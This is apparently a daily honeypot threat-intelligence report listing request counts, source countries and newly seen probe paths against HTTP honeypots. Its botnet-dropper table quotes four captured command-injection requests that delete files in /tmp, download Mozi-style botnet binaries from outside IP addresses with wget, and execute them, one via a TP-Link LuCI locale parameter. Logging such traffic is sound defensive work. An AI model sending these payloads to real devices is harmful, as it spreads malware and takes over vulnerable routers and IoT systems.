Skip to main content
  1. Daily-Posts/

Report: 2025-05-19

·443 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-19
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 31 new requests that have never been observed before (these were added to the monitored request database.).

A total of 916 requests were recorded during the day, originating from 4 different countries, with a peak of 217 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
27.43.205.52GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
8.152.208.190GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5 HTTP/1.1
124.220.11.157GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11
141.98.11.128GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
223GET /admin/assets/js/pbxlib.js HTTP/1.0
802GET /js HTTP/1.1
812GET /BU HTTP/1.1
822GET /st HTTP/1.1
832GET /Cp HTTP/1.1
842GET /bu HTTP/1.1
862GET /s HTTP/1.1
872GET /m HTTP/1.1
882GET /css/test HTTP/1.1
892GET /cms/test HTTP/1.1
902GET /cli/test HTTP/1.1
912GET /bot/test HTTP/1.1
922GET /bin/test HTTP/1.1
932GET /ads/test HTTP/1.1
942GET /acp/test HTTP/1.1
952GET /Web/test HTTP/1.1
962GET /New/test HTTP/1.1
972GET /Inc/test HTTP/1.1
982GET /Env/test HTTP/1.1
992GET /doc/test HTTP/1.1
1002GET /DOC/test HTTP/1.1
1032GET /div/test HTTP/1.1
1042GET /dev/test HTTP/1.1
1052GET /DEV/test HTTP/1.1
1062GET /Dev/test HTTP/1.1
1741POST /soap/server_sa/ HTTP/1.1
1801\x00\x0E8`&\x8A\xD9\x97w\xB0\xCE\x00\x00\x00\x00\x00
1811\x00\x0E\x08`&\x8A\xD9\x97w\xB0\xCE\x00\x00\x00\x00\x00
1841GET /Vk2j HTTP/1.1
1851GET /9phK HTTP/1.1
2191GET /Doc/test HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0217US
1178BG
287PL
380GB
460NL
545ID
639JP
729DE
822HK
914CN
1013RU
1112IN
1212UA
1312AZ
1412CA
1510SC
1610LT
178GH
186BR
195KR
205SG
215ZA
224MD
234IL
243FR
253ES
263BE
273PK
282PH
292VN
302TR
312SE
321RO
331PT
341IR
351AR
361MY
371KE
381AO

Related

Report: 2025-05-18
·4142 words
Repport Daily
Report: 2025-05-17
·313 words
Repport Daily
Report: 2025-05-16
·1581 words
Repport Daily